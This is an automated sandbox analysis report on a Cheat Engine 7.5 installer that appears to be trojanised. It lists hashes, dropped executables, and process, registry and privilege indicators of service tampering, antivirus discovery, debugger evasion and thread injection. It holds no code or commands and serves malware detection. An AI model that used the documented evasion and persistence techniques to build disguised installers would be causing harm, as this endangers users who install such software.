5a5b2e52a750ce97e804909801539c65486eb40df8ad849ac2544ba620352a16

Analysis

max time kernel
149s
max time network
158s
platform
windows10-1703_x64
resource
win10-20231025-en
resource tags

arch:x64arch:x86image:win10-20231025-enlocale:en-usos:windows10-1703-x64system
submitted
20/11/2023, 21:35

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

CheatEngine75.exe
Size

8.6MB
MD5

860e4cc52ff5a06431d108f688904b23
SHA1

76d3d4812dad80254c6025728272ad113fddded3
SHA256

5a5b2e52a750ce97e804909801539c65486eb40df8ad849ac2544ba620352a16
SHA512

89d52eb4bd8fbf59ebf4f3e148a598330267e643dab610f4a8718eecd93a5d5385754297335aefa6344f3ae05030c1b408098f4f3a9c07815642833a406e7d50
SSDEEP

196608:vxVZJZ8b2rMNUZHkof8ZBNSOHfiVdaFfPr2Oz2XmbrUAej:vnZJWb2WDofPNdaJ2OyX8UN

Score

8^/10

discovery evasion persistence

Malware Config

Signatures

Creates new service(s) 1 TTPs
persistence

Windows Service
T1543.003
Stops running service(s) 3 TTPs
evasion

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Executes dropped EXE 12 IoCs

pid	Process
3836	fz_ServerSession.exe
2560	conhost_fz.exe
3996	CheatEngine75.exe
4912	CheatEngine75.tmp
3468	VC_redist.x64.exe
3756	CheatEngine75.exe
3668	CheatEngine75.tmp
2824	_setup64.tmp
2748	Kernelmoduleunloader.exe
4220	windowsrepair.exe
4532	Cheat Engine.exe
3480	cheatengine-x86_64-SSE4-AVX2.exe

Loads dropped DLL 10 IoCs

pid	Process
4912	CheatEngine75.tmp
4912	CheatEngine75.tmp
4912	CheatEngine75.tmp
3480	cheatengine-x86_64-SSE4-AVX2.exe
3480	cheatengine-x86_64-SSE4-AVX2.exe
3480	cheatengine-x86_64-SSE4-AVX2.exe
3480	cheatengine-x86_64-SSE4-AVX2.exe
3480	cheatengine-x86_64-SSE4-AVX2.exe
3480	cheatengine-x86_64-SSE4-AVX2.exe
3480	cheatengine-x86_64-SSE4-AVX2.exe

Modifies file permissions 1 TTPs 2 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
2052	icacls.exe
1008	icacls.exe

Checks for any installed AV software in registry 1 TTPs 9 IoCs

Security Software Discovery

T1518.001

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-2852493121-870915337-2715324265-1000\SOFTWARE\Avira\Browser\Installed	CheatEngine75.tmp
Key opened	\REGISTRY\MACHINE\SOFTWARE\AVAST Software\Avast	CheatEngine75.tmp
Key opened	\REGISTRY\USER\S-1-5-21-2852493121-870915337-2715324265-1000\SOFTWARE\AVAST Software\Avast	CheatEngine75.tmp
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\AVG\AV\Dir	CheatEngine75.tmp
Key opened	\REGISTRY\USER\S-1-5-21-2852493121-870915337-2715324265-1000\SOFTWARE\AVG\AV\Dir	CheatEngine75.tmp
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Avira\Browser\Installed	CheatEngine75.tmp
Key opened	\REGISTRY\MACHINE\SOFTWARE\Avira\Browser\Installed	CheatEngine75.tmp
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\AVAST Software\Avast	CheatEngine75.tmp
Key opened	\REGISTRY\MACHINE\SOFTWARE\AVG\AV\Dir	CheatEngine75.tmp

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Drops file in System32 directory 47 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\imm32.dll	cheatengine-x86_64-SSE4-AVX2.exe
File opened for modification	C:\Windows\SYSTEM32\msimg32.dll	cheatengine-x86_64-SSE4-AVX2.exe
File opened for modification	C:\Windows\system32\explorerframe.dll	cheatengine-x86_64-SSE4-AVX2.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log	powershell.exe
File opened for modification	C:\Windows\System32\cfgmgr32.dll	cheatengine-x86_64-SSE4-AVX2.exe
File opened for modification	C:\Windows\SYSTEM32\version.dll	cheatengine-x86_64-SSE4-AVX2.exe
File opened for modification	C:\Windows\System32\profapi.dll	cheatengine-x86_64-SSE4-AVX2.exe
File opened for modification	C:\Windows\System32\ole32.dll	cheatengine-x86_64-SSE4-AVX2.exe
File opened for modification	C:\Windows\System32\oleaut32.dll	cheatengine-x86_64-SSE4-AVX2.exe
File opened for modification	C:\Windows\System32\windows.storage.dll	cheatengine-x86_64-SSE4-AVX2.exe
File opened for modification	C:\Windows\System32\ws2_32.dll	cheatengine-x86_64-SSE4-AVX2.exe
File opened for modification	C:\Windows\SYSTEM32\winmm.dll	cheatengine-x86_64-SSE4-AVX2.exe
File opened for modification	C:\Windows\System32\clbcatq.dll	cheatengine-x86_64-SSE4-AVX2.exe
File opened for modification	C:\Windows\System32\MSCTF.dll	cheatengine-x86_64-SSE4-AVX2.exe
File opened for modification	C:\Windows\System32\RPCRT4.dll	cheatengine-x86_64-SSE4-AVX2.exe
File opened for modification	C:\Windows\System32\GDI32.dll	cheatengine-x86_64-SSE4-AVX2.exe
File opened for modification	C:\Windows\System32\sechost.dll	cheatengine-x86_64-SSE4-AVX2.exe
File opened for modification	C:\Windows\System32\powrprof.dll	cheatengine-x86_64-SSE4-AVX2.exe
File opened for modification	C:\Windows\SYSTEM32\wsock32.dll	cheatengine-x86_64-SSE4-AVX2.exe
File opened for modification	C:\Windows\system32\MRT.exe	VC_redist.x64.exe
File opened for modification	C:\Windows\System32\KERNELBASE.dll	cheatengine-x86_64-SSE4-AVX2.exe
File opened for modification	C:\Windows\SYSTEM32\uxtheme.dll	cheatengine-x86_64-SSE4-AVX2.exe
File opened for modification	C:\Windows\SYSTEM32\PROPSYS.dll	cheatengine-x86_64-SSE4-AVX2.exe
File opened for modification	C:\Windows\System32\msvcp_win.dll	cheatengine-x86_64-SSE4-AVX2.exe
File opened for modification	C:\Windows\System32\ucrtbase.dll	cheatengine-x86_64-SSE4-AVX2.exe
File opened for modification	C:\Windows\System32\shlwapi.dll	cheatengine-x86_64-SSE4-AVX2.exe
File opened for modification	C:\Windows\System32\kernel.appcore.dll	cheatengine-x86_64-SSE4-AVX2.exe
File opened for modification	C:\Windows\SYSTEM32\WINMMBASE.dll	cheatengine-x86_64-SSE4-AVX2.exe
File opened for modification	C:\Windows\SYSTEM32\GLU32.dll	cheatengine-x86_64-SSE4-AVX2.exe
File opened for modification	C:\Windows\system32\MRT.exe	conhost_fz.exe
File opened for modification	C:\Windows\System32\advapi32.dll	cheatengine-x86_64-SSE4-AVX2.exe
File opened for modification	C:\Windows\System32\shell32.dll	cheatengine-x86_64-SSE4-AVX2.exe
File opened for modification	C:\Windows\System32\psapi.dll	cheatengine-x86_64-SSE4-AVX2.exe
File opened for modification	C:\Windows\SYSTEM32\wininet.dll	cheatengine-x86_64-SSE4-AVX2.exe
File opened for modification	C:\Windows\System32\msvcrt.dll	cheatengine-x86_64-SSE4-AVX2.exe
File opened for modification	C:\Windows\System32\shcore.dll	cheatengine-x86_64-SSE4-AVX2.exe
File opened for modification	C:\Windows\System32\comdlg32.dll	cheatengine-x86_64-SSE4-AVX2.exe
File opened for modification	C:\Windows\SYSTEM32\ntdll.dll	cheatengine-x86_64-SSE4-AVX2.exe
File opened for modification	C:\Windows\System32\KERNEL32.DLL	cheatengine-x86_64-SSE4-AVX2.exe
File opened for modification	C:\Windows\System32\bcryptPrimitives.dll	cheatengine-x86_64-SSE4-AVX2.exe
File opened for modification	C:\Windows\System32\user32.dll	cheatengine-x86_64-SSE4-AVX2.exe
File opened for modification	C:\Windows\System32\gdi32full.dll	cheatengine-x86_64-SSE4-AVX2.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\System32\combase.dll	cheatengine-x86_64-SSE4-AVX2.exe
File opened for modification	C:\Windows\System32\win32u.dll	cheatengine-x86_64-SSE4-AVX2.exe
File opened for modification	C:\Windows\SYSTEM32\opengl32.dll	cheatengine-x86_64-SSE4-AVX2.exe
File opened for modification	C:\Windows\SYSTEM32\hhctrl.ocx	cheatengine-x86_64-SSE4-AVX2.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

pid	Process
1812	CheatEngine75.exe
1812	CheatEngine75.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 3468 set thread context of 4148	3468	VC_redist.x64.exe	144

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File created	C:\Program Files\Cheat Engine 7.5\autorun\dlls\32\is-7QJG1.tmp	CheatEngine75.tmp
File opened for modification	C:\Program Files\Cheat Engine 7.5\dll\kernelbase.pdb	cheatengine-x86_64-SSE4-AVX2.exe
File opened for modification	C:\Program Files\Cheat Engine 7.5\dll\ucrtbase.pdb	cheatengine-x86_64-SSE4-AVX2.exe
File opened for modification	C:\Program Files\Cheat Engine 7.5\cryptnet.pdb	cheatengine-x86_64-SSE4-AVX2.exe
File opened for modification	C:\Program Files\Cheat Engine 7.5\ced3d9hook64.dll	CheatEngine75.tmp
File created	C:\Program Files\Cheat Engine 7.5\include\sec_api\is-LOE6I.tmp	CheatEngine75.tmp
File created	C:\Program Files\Cheat Engine 7.5\plugins\c# template\CEPluginLibrary\bin\Release\is-SEAHT.tmp	CheatEngine75.tmp
File opened for modification	C:\Program Files\Cheat Engine 7.5\symbols\dll\oleaut32.pdb	cheatengine-x86_64-SSE4-AVX2.exe
File opened for modification	C:\Program Files\Cheat Engine 7.5\dll\msvcrt.pdb	cheatengine-x86_64-SSE4-AVX2.exe
File opened for modification	C:\Program Files\Cheat Engine 7.5\symbols\dll\profapi.pdb	cheatengine-x86_64-SSE4-AVX2.exe
File opened for modification	C:\Program Files\Cheat Engine 7.5\dll\sspicli.pdb	cheatengine-x86_64-SSE4-AVX2.exe
File created	C:\Program Files\Cheat Engine 7.5\include\is-GLMNG.tmp	CheatEngine75.tmp
File created	C:\Program Files\Cheat Engine 7.5\plugins\c# template\CEPluginLibrary\Properties\is-86SG8.tmp	CheatEngine75.tmp
File created	C:\Program Files\Cheat Engine 7.5\autorun\ceshare\is-J6HEQ.tmp	CheatEngine75.tmp
File opened for modification	C:\Program Files\Cheat Engine 7.5\oleaut32.pdb	cheatengine-x86_64-SSE4-AVX2.exe
File opened for modification	C:\Program Files\Cheat Engine 7.5\hhctrl.pdb	cheatengine-x86_64-SSE4-AVX2.exe
File created	C:\Program Files\Cheat Engine 7.5\is-9PLDG.tmp	CheatEngine75.tmp
File created	C:\Program Files\Cheat Engine 7.5\include\winapi\is-0HP6M.tmp	CheatEngine75.tmp
File created	C:\Program Files\Cheat Engine 7.5\plugins\example-c\is-2USQV.tmp	CheatEngine75.tmp
File created	C:\Program Files\Cheat Engine 7.5\badassets\is-6NEEC.tmp	CheatEngine75.tmp
File opened for modification	C:\Program Files\Cheat Engine 7.5\symbols\dll\user32.pdb	cheatengine-x86_64-SSE4-AVX2.exe
File opened for modification	C:\Program Files\Cheat Engine 7.5\symbols\dll\opengl32.pdb	cheatengine-x86_64-SSE4-AVX2.exe
File opened for modification	C:\Program Files\Cheat Engine 7.5\sspicli.pdb	cheatengine-x86_64-SSE4-AVX2.exe
File opened for modification	C:\Program Files\Cheat Engine 7.5\symbols\DLL\winnsi.pdb	cheatengine-x86_64-SSE4-AVX2.exe
File opened for modification	C:\Program Files\Cheat Engine 7.5\cheatengine-x86_64-SSE4-AVX2.exe	CheatEngine75.tmp
File created	C:\Program Files\Cheat Engine 7.5\autorun\is-NGTID.tmp	CheatEngine75.tmp
File opened for modification	C:\Program Files\Cheat Engine 7.5\dll\urlmon.pdb	cheatengine-x86_64-SSE4-AVX2.exe
File opened for modification	C:\Program Files\Cheat Engine 7.5\DLL\kernel32.pdb	cheatengine-x86_64-SSE4-AVX2.exe
File opened for modification	C:\Program Files\Cheat Engine 7.5\dll\ExplorerFrame.pdb	cheatengine-x86_64-SSE4-AVX2.exe
File opened for modification	C:\Program Files\Cheat Engine 7.5\windowsrepair.exe	CheatEngine75.tmp
File created	C:\Program Files\Cheat Engine 7.5\autorun\ceshare\forms\is-DLJUM.tmp	CheatEngine75.tmp
File created	C:\Program Files\Cheat Engine 7.5\include\winapi\is-7F08B.tmp	CheatEngine75.tmp
File created	C:\Program Files\Cheat Engine 7.5\autorun\dlls\src\Java\CEJVMTI\CEJVMTI\is-5J4L5.tmp	CheatEngine75.tmp
File created	C:\Program Files\Cheat Engine 7.5\unins000.msg	CheatEngine75.tmp
File created	C:\Program Files\Cheat Engine 7.5\is-6Q5D8.tmp	CheatEngine75.tmp
File created	C:\Program Files\Cheat Engine 7.5\include\sec_api\sys\is-9NFV3.tmp	CheatEngine75.tmp
File opened for modification	C:\Program Files\Cheat Engine 7.5\Kernel.Appcore.pdb	cheatengine-x86_64-SSE4-AVX2.exe
File opened for modification	C:\Program Files\Cheat Engine 7.5\msIso.pdb	cheatengine-x86_64-SSE4-AVX2.exe
File created	C:\Program Files\Cheat Engine 7.5\include\is-TGUUM.tmp	CheatEngine75.tmp
File opened for modification	C:\Program Files\Cheat Engine 7.5\symbols\dll\sechost.pdb	cheatengine-x86_64-SSE4-AVX2.exe
File created	C:\Program Files\Cheat Engine 7.5\include\sys\is-816UC.tmp	CheatEngine75.tmp
File created	C:\Program Files\Cheat Engine 7.5\include\is-IQH3L.tmp	CheatEngine75.tmp
File created	C:\Program Files\Cheat Engine 7.5\include\sec_api\is-F9UG1.tmp	CheatEngine75.tmp
File opened for modification	C:\Program Files\Cheat Engine 7.5\symbols\dll\WINMMBASE.pdb	cheatengine-x86_64-SSE4-AVX2.exe
File opened for modification	C:\Program Files\Cheat Engine 7.5\dll\msimg32.pdb	cheatengine-x86_64-SSE4-AVX2.exe
File opened for modification	C:\Program Files\Cheat Engine 7.5\msasn1.pdb	cheatengine-x86_64-SSE4-AVX2.exe
File created	C:\Program Files\Cheat Engine 7.5\languages\is-V1QBH.tmp	CheatEngine75.tmp
File opened for modification	C:\Program Files\Cheat Engine 7.5\wsock32.pdb	cheatengine-x86_64-SSE4-AVX2.exe
File opened for modification	C:\Program Files\Cheat Engine 7.5\d3dhook.dll	CheatEngine75.tmp
File created	C:\Program Files\Cheat Engine 7.5\autorun\is-M0JNA.tmp	CheatEngine75.tmp
File created	C:\Program Files\Cheat Engine 7.5\autorun\ceshare\forms\is-1RBF1.tmp	CheatEngine75.tmp
File created	C:\Program Files\Cheat Engine 7.5\plugins\c# template\CEPluginLibrary\is-UT095.tmp	CheatEngine75.tmp
File opened for modification	C:\Program Files\Cheat Engine 7.5\dll\XInput1_4.pdb	cheatengine-x86_64-SSE4-AVX2.exe
File opened for modification	C:\Program Files\Cheat Engine 7.5\cheatengine-x86_64.exe	CheatEngine75.tmp
File opened for modification	C:\Program Files\Cheat Engine 7.5\vehdebug-x86_64.dll	CheatEngine75.tmp
File opened for modification	C:\Program Files\Cheat Engine 7.5\speedhack-i386.dll	CheatEngine75.tmp
File opened for modification	C:\Program Files\Cheat Engine 7.5\dwmapi.pdb	cheatengine-x86_64-SSE4-AVX2.exe
File created	C:\Program Files\Cheat Engine 7.5\autorun\ceshare\is-BSK9N.tmp	CheatEngine75.tmp
File created	C:\Program Files\Cheat Engine 7.5\autorun\dlls\src\Java\CEJVMTI\CEJVMTI\is-OOG2I.tmp	CheatEngine75.tmp
File opened for modification	C:\Program Files\Cheat Engine 7.5\symbols\dll\nsi.pdb	cheatengine-x86_64-SSE4-AVX2.exe
File opened for modification	C:\Program Files\Cheat Engine 7.5\DLL\dpapi.pdb	cheatengine-x86_64-SSE4-AVX2.exe
File created	C:\Program Files\Cheat Engine 7.5\is-ON4US.tmp	CheatEngine75.tmp
File created	C:\Program Files\Cheat Engine 7.5\autorun\is-J3SO1.tmp	CheatEngine75.tmp
File opened for modification	C:\Program Files\Cheat Engine 7.5\imm32.pdb	cheatengine-x86_64-SSE4-AVX2.exe

Drops file in Windows directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.15063.0_none_108e4f62dfe5d999\comctl32.dll	cheatengine-x86_64-SSE4-AVX2.exe

Launches sc.exe 16 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
3688	sc.exe
2892	sc.exe
4948	sc.exe
2052	sc.exe
3768	sc.exe
1720	sc.exe
1632	sc.exe
2912	sc.exe
1804	sc.exe
4580	sc.exe
4708	sc.exe
236	sc.exe
768	sc.exe
5068	sc.exe
4788	sc.exe
4748	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	CheatEngine75.tmp
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\	CheatEngine75.tmp

Modifies data under HKEY_USERS 47 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe

Modifies registry class 12 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.CT	CheatEngine75.tmp
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.CT\ = "CheatEngine"	CheatEngine75.tmp
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CheatEngine\ = "Cheat Engine"	CheatEngine75.tmp
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CheatEngine\DefaultIcon	CheatEngine75.tmp
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CheatEngine\shell\open	CheatEngine75.tmp
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.CETRAINER	CheatEngine75.tmp
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.CETRAINER\ = "CheatEngine"	CheatEngine75.tmp
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CheatEngine\shell\open\command	CheatEngine75.tmp
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CheatEngine\shell	CheatEngine75.tmp
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CheatEngine\shell\open\command\ = "\"C:\\Program Files\\Cheat Engine 7.5\\Cheat Engine.exe\" \"%1\""	CheatEngine75.tmp
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CheatEngine	CheatEngine75.tmp
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CheatEngine\DefaultIcon\ = "C:\\Program Files\\Cheat Engine 7.5\\Cheat Engine.exe,0"	CheatEngine75.tmp

Runs net.exe

Script User-Agent 3 IoCs

Uses user-agent string associated with script host/environment.

description	flow	ioc
HTTP User-Agent header	2	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	10	Cheat Engine 7.5 : luascript-ceshare
HTTP User-Agent header	10	Cheat Engine 7.5 : luascript-CEVersionCheck

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
3836	fz_ServerSession.exe
3836	fz_ServerSession.exe
3836	fz_ServerSession.exe
3836	fz_ServerSession.exe
3836	fz_ServerSession.exe
3836	fz_ServerSession.exe
3836	fz_ServerSession.exe
3836	fz_ServerSession.exe
3836	fz_ServerSession.exe
3836	fz_ServerSession.exe
3836	fz_ServerSession.exe
3836	fz_ServerSession.exe
320	powershell.exe
3836	fz_ServerSession.exe
3836	fz_ServerSession.exe
3836	fz_ServerSession.exe
3836	fz_ServerSession.exe
320	powershell.exe
3836	fz_ServerSession.exe
3836	fz_ServerSession.exe
3836	fz_ServerSession.exe
3836	fz_ServerSession.exe
3836	fz_ServerSession.exe
3836	fz_ServerSession.exe
3836	fz_ServerSession.exe
3836	fz_ServerSession.exe
3836	fz_ServerSession.exe
3836	fz_ServerSession.exe
3836	fz_ServerSession.exe
3836	fz_ServerSession.exe
3836	fz_ServerSession.exe
3836	fz_ServerSession.exe
3836	fz_ServerSession.exe
3836	fz_ServerSession.exe
3836	fz_ServerSession.exe
3836	fz_ServerSession.exe
3836	fz_ServerSession.exe
3836	fz_ServerSession.exe
3836	fz_ServerSession.exe
3836	fz_ServerSession.exe
3836	fz_ServerSession.exe
3836	fz_ServerSession.exe
3836	fz_ServerSession.exe
3836	fz_ServerSession.exe
3836	fz_ServerSession.exe
3836	fz_ServerSession.exe
3836	fz_ServerSession.exe
3836	fz_ServerSession.exe
3836	fz_ServerSession.exe
3836	fz_ServerSession.exe
3836	fz_ServerSession.exe
3836	fz_ServerSession.exe
3836	fz_ServerSession.exe
3836	fz_ServerSession.exe
3836	fz_ServerSession.exe
3836	fz_ServerSession.exe
3836	fz_ServerSession.exe
3836	fz_ServerSession.exe
3836	fz_ServerSession.exe
3836	fz_ServerSession.exe
3836	fz_ServerSession.exe
3836	fz_ServerSession.exe
3836	fz_ServerSession.exe
3836	fz_ServerSession.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	3836	fz_ServerSession.exe
Token: SeDebugPrivilege	320	powershell.exe
Token: SeDebugPrivilege	2288	powershell.exe
Token: SeIncreaseQuotaPrivilege	2288	powershell.exe
Token: SeSecurityPrivilege	2288	powershell.exe
Token: SeTakeOwnershipPrivilege	2288	powershell.exe
Token: SeLoadDriverPrivilege	2288	powershell.exe
Token: SeSystemProfilePrivilege	2288	powershell.exe
Token: SeSystemtimePrivilege	2288	powershell.exe
Token: SeProfSingleProcessPrivilege	2288	powershell.exe
Token: SeIncBasePriorityPrivilege	2288	powershell.exe
Token: SeCreatePagefilePrivilege	2288	powershell.exe
Token: SeBackupPrivilege	2288	powershell.exe
Token: SeRestorePrivilege	2288	powershell.exe
Token: SeShutdownPrivilege	2288	powershell.exe
Token: SeDebugPrivilege	2288	powershell.exe
Token: SeSystemEnvironmentPrivilege	2288	powershell.exe
Token: SeRemoteShutdownPrivilege	2288	powershell.exe
Token: SeUndockPrivilege	2288	powershell.exe
Token: SeManageVolumePrivilege	2288	powershell.exe
Token: 33	2288	powershell.exe
Token: 34	2288	powershell.exe
Token: 35	2288	powershell.exe
Token: 36	2288	powershell.exe
Token: SeShutdownPrivilege	1208	powercfg.exe
Token: SeCreatePagefilePrivilege	1208	powercfg.exe
Token: SeShutdownPrivilege	1092	powercfg.exe
Token: SeCreatePagefilePrivilege	1092	powercfg.exe
Token: SeShutdownPrivilege	3228	powercfg.exe
Token: SeCreatePagefilePrivilege	3228	powercfg.exe
Token: SeShutdownPrivilege	5016	powercfg.exe
Token: SeCreatePagefilePrivilege	5016	powercfg.exe
Token: SeDebugPrivilege	4224	powershell.exe
Token: SeAssignPrimaryTokenPrivilege	4224	powershell.exe
Token: SeIncreaseQuotaPrivilege	4224	powershell.exe
Token: SeSecurityPrivilege	4224	powershell.exe
Token: SeTakeOwnershipPrivilege	4224	powershell.exe
Token: SeLoadDriverPrivilege	4224	powershell.exe
Token: SeSystemtimePrivilege	4224	powershell.exe
Token: SeBackupPrivilege	4224	powershell.exe
Token: SeRestorePrivilege	4224	powershell.exe
Token: SeShutdownPrivilege	4224	powershell.exe
Token: SeSystemEnvironmentPrivilege	4224	powershell.exe
Token: SeUndockPrivilege	4224	powershell.exe
Token: SeManageVolumePrivilege	4224	powershell.exe
Token: SeShutdownPrivilege	4104	powercfg.exe
Token: SeCreatePagefilePrivilege	4104	powercfg.exe
Token: SeShutdownPrivilege	4888	powercfg.exe
Token: SeCreatePagefilePrivilege	4888	powercfg.exe
Token: SeShutdownPrivilege	204	powercfg.exe
Token: SeCreatePagefilePrivilege	204	powercfg.exe
Token: SeShutdownPrivilege	424	powercfg.exe
Token: SeCreatePagefilePrivilege	424	powercfg.exe
Token: SeDebugPrivilege	3480	cheatengine-x86_64-SSE4-AVX2.exe
Token: SeTcbPrivilege	3480	cheatengine-x86_64-SSE4-AVX2.exe
